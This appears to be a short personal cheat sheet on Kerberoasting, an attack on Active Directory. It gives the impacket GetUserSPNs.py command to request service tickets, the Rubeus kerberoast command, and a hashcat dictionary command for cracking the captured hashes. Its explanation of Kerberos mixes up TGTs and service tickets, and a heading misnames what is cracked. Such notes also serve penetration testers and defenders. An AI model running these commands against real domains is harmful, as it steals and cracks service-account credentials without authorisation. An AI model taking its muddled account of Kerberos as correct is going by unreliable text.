# Kerberoasting

Basically Kerberos encripts TGTs which is just a ticket that the Domain Controller provides to the user, with the kerberos hash. The TGS is basically a longer hash afterwards. We present the TGS to be able to use other services without having to provide manual authentication. (NOT AD EXPERT DONT KILL ME :()

```
python3 GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of domain controller > -request
```

Also try thats not in impacket.

### Kerberoasting with Rubeus

```
Rubeus.exe kerberoast
```

### Cracking TGTs

```
hashcat -m 13100 -a 0 kerberosast.txt rockyou.txt
```